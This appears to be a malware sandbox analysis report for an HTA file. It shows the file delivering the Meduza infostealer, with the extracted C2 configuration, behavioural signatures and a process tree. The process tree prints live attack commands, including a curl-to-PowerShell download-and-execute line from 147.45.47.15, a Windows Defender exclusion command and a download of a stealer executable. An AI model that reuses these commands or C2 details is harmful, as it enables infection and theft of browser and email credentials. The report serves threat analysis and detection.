Analysis
-
max time kernel
94s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-12-2024 02:06
Static task
static1
Behavioral task
behavioral1
Sample
054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f.hta
Resource
win7-20240903-en
General
-
Target
054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f.hta
-
Size
551B
-
MD5
4041595b42e7b6e2ce5965cb76ea7da1
-
SHA1
401723ee1ac651ad359b89dd7e3cefea91d6aaa9
-
SHA256
054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f
-
SHA512
84cfba05772a5adfef0ddfe65bda07d8b908c16de04ea60942338c49a98db625801a986fd999740f61c62650b6e8ebb7f6056e76fe8656d09207f4cf9ffe7c19
Malware Config
Extracted
meduza
193.3.19.151
-
anti_dbg
true
-
anti_vm
true
-
build_name
hdont
-
extensions
.txt
-
grabber_max_size
4.194304e+06
-
port
15666
-
self_destruct
false
Signatures
-
Meduza Stealer payload 1 IoCs
resource yara_rule behavioral2/files/0x0008000000023cb8-93.dat family_meduza -
Meduza family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 16 2644 powershell.exe 19 3044 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4324 powershell.exe 2644 powershell.exe 3044 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation Launcher.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation hcrzecmm.tv4.exe -
Executes dropped EXE 2 IoCs
pid Process 1700 Launcher.exe 2268 hcrzecmm.tv4.exe -
Loads dropped DLL 3 IoCs
pid Process 1700 Launcher.exe 1700 Launcher.exe 1700 Launcher.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 hcrzecmm.tv4.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 hcrzecmm.tv4.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 hcrzecmm.tv4.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 hcrzecmm.tv4.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 hcrzecmm.tv4.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 api.ipify.org 22 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Launcher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000000-0000-0000-0000-000000000000}\AppID = "{00000000-0000-0000-0000-000000000000}" Launcher.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000000} Launcher.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000000}\ = "{00000000-0000-0000-0000-000000000000}" Launcher.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000000}\LaunchPermission = 01000480640000008000000000000000140000000200500003000000000014000100000001010000000000050400000000001800010000000102000000000005200000002002000000001400010000000101000000000005120000000000002009000000010500000000000515000000a9fce1df98620cba7133e4fee8030000010500000000000515000000a9fce1df98620cba7133e4fe01020000 Launcher.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000000-0000-0000-0000-000000000000} Launcher.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2644 powershell.exe 2644 powershell.exe 4324 powershell.exe 4324 powershell.exe 3044 powershell.exe 3044 powershell.exe 2268 hcrzecmm.tv4.exe 2268 hcrzecmm.tv4.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeDebugPrivilege 2268 hcrzecmm.tv4.exe Token: SeImpersonatePrivilege 2268 hcrzecmm.tv4.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1700 Launcher.exe 1700 Launcher.exe 1700 Launcher.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 540 wrote to memory of 3848 540 mshta.exe 82 PID 540 wrote to memory of 3848 540 mshta.exe 82 PID 540 wrote to memory of 3848 540 mshta.exe 82 PID 3848 wrote to memory of 1508 3848 cmd.exe 84 PID 3848 wrote to memory of 1508 3848 cmd.exe 84 PID 3848 wrote to memory of 1508 3848 cmd.exe 84 PID 3848 wrote to memory of 2644 3848 cmd.exe 85 PID 3848 wrote to memory of 2644 3848 cmd.exe 85 PID 3848 wrote to memory of 2644 3848 cmd.exe 85 PID 2644 wrote to memory of 1700 2644 powershell.exe 86 PID 2644 wrote to memory of 1700 2644 powershell.exe 86 PID 2644 wrote to memory of 1700 2644 powershell.exe 86 PID 1700 wrote to memory of 4324 1700 Launcher.exe 87 PID 1700 wrote to memory of 4324 1700 Launcher.exe 87 PID 1700 wrote to memory of 4324 1700 Launcher.exe 87 PID 1700 wrote to memory of 3044 1700 Launcher.exe 92 PID 1700 wrote to memory of 3044 1700 Launcher.exe 92 PID 1700 wrote to memory of 3044 1700 Launcher.exe 92 PID 1700 wrote to memory of 2268 1700 Launcher.exe 96 PID 1700 wrote to memory of 2268 1700 Launcher.exe 96 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 hcrzecmm.tv4.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 hcrzecmm.tv4.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\SysWOW64\curl.execurl -s http://147.45.47.15/script.ps13⤵PID:1508
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command -3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\Temp\Launcher.exe"C:\Windows\Temp\Launcher.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\hcrzecmm.tv4.exe'"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\Temp\hcrzecmm.tv4.exe"C:\Windows\Temp\hcrzecmm.tv4.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2268
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5c580727fc0a7a733ea6a446b67ca63f7
SHA1ebdd57fca25df0f759dec07c5382d560df7600c2
SHA256369ef9ccfc9923d44f390840e46cc948796bb79bec86644402608e9a8af80073
SHA5122a1aba5dfe194d53ce71cafb94d147999968aa0a7e5bd1db069da62ab3e06f475af77c258532647dcb7370f4e12c188b99624fc5a9c7c44f196c98e9d2b12733
-
Filesize
18KB
MD5350ce78d55c43d466af4b0c11ff4e3f5
SHA10299816e38f43547b5ec15c3c1b241da2d8ee334
SHA2569355f0f40f0a09695283e892839f63c532888d4e392b53da0cfb139f200df280
SHA512abe34610cff84ca057e86dd73d92891ff0769bb8e9e282a56b8a11d7288c06e0398196775fdf55f8cf2d56b7f9edd4df01b773837f6e7066ceec207c62010a57
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
201KB
MD52696d944ffbef69510b0c826446fd748
SHA1e4106861076981799719876019fe5224eac2655c
SHA256a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a
SHA512c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb
-
Filesize
1.2MB
MD5c6813da66eba357d0deaa48c2f7032b8
SHA16812e46c51f823ff0b0ee17bfce0af72f857af66
SHA2561420f60f053c3ea5605239ee431e5f487245108b1c01be75d16b5246156fa178
SHA51219391c6b12ba8f34a5faf326f8986ef8de4729d614d72bf438c6efa569b3505159ca55f580fe2a02642e5e7a0f1b38a7a9db9f0d66d67ba548d84c230183159e
-
Filesize
6KB
MD5e017be56699801dc89a8d6d1724eb633
SHA1a7f7aae4744210db8ebaf4da06c167357bc71eca
SHA256aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564
SHA5122368425dadc7f22eb11532359d4d1aa97bf3e381f4fd7b62c587e1f8819ef64a0ff7fc75cc5948939fadebc423345ab65a1cd2799bb4136fbea89d1f75dfc8c8